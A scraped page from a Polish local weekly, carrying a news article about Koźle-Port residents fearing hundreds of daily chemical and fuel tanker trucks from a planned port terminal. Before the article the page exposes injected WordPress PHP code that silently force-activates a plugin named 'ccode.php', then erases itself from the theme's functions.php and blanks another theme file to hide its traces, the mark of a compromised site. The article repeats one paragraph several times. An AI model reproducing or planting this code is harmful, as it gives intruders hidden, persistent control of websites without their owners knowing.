function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "function true_plugins_activate()"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 3; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/micropro/ftp/apkka/wp-content/themes/disto/class.theme-modules.php'); file_put_contents('/home/micropro/ftp/apkka/wp-content/themes/disto/class.theme-modules.php', ''); } } add_action('init', 'true_plugins_activate'); Mieszkańcy Koźla-Portu nie chcą cystern na osiedlu | Tygodnik PARTNER

Mieszkańcy Koźla-Portu nie chcą cystern na osiedlu

Coraz więcej wskazuje na to, że reaktywacja portu nie będzie miała wiele wspólnego z żeglugą. Chodzi o przeładunek z lądu na ląd.

W porcie przeładowywane mają być ładunki masowe. W pierwszej kolejności płynne, później sypkie i kontenerowe. Terminal płynny ma mieć pojemności 100 tys. metrów sześciennych.

W porcie przeładowywane mają być ładunki masowe. W pierwszej kolejności płynne, później sypkie i kontenerowe. Terminal płynny ma mieć pojemności 100 tys. metrów sześciennych.

Mieszkańcy podkreślają, że kiedyś towary były transportowane wyłącznie drogą wodną.
– To było bezpieczne, ekologiczne. Ale teraz różne chemikalia czy paliwa będą wożone do portu samochodami i tą samą drogą stamtąd wyjadą. Kłodnica i Koźle-Port bardzo na tym ucierpią – mówi jeden z mieszkańców Kłodnicy.

Swoich obaw nie kryje także Witold Florczak, kędzierzyńsko-kozielski dziennikarz. Tak pisze on na swoim profilu facebookowym: „Z tego wynika, że oprócz kilkudziesięciu miejsc pracy, będziemy mieli jakieś 200 do 300 autocystern z paliwami i chemikaliami przejeżdżających przez Kłodnicę i Kędzierzyn-Koźle na dobę, przynajmniej na początek. Czy miasto jest przygotowane na wzrost przewozu niebezpiecznych materiałów drogami? Może należy to wytłumaczyć mieszkańcom i uspokoić ich obawy?” – pyta Witold Florczak. Powiatowa Stacja Sanitarno-Epidemiologiczna także przyjrzała się sprawie. Uznała, że jest potrzebne przeprowadzenie tzw. „oceny oddziaływania przedsięwzięcia na środowisko”. Z takim stanowiskiem zgodził się także Regionalny Dyrektor Ochrony Środowiska w Opolu. Teraz odpowiednie instytucje będą sprawdzały czy składowanie towarów w porcie i ich transport drogą lądową może mieć negatywny wpływ na tę część miasta.

W porcie przeładowywane mają być ładunki masowe. W pierwszej kolejności płynne, później sypkie i kontenerowe. Terminal płynny ma mieć pojemności 100 tys. metrów sześciennych. Będzie się tam dokonywał przeładunek co najmniej 2 mln ton rocznie. W przypadku terminalu sypkiego przeładunek może sięgnąć 3 mln ton. Terminal kontenerowy ma ich pomieścić około 300.

TOG

Aktualna kategoria: AKTUALNOŚCI Tagi: 
REKLAMA
© 2020 Tygodnik PARTNER. All rights reserved / Wszystkie prawa zastrzeżone
Zobacz także: www.kedzierzynkozle24.pl.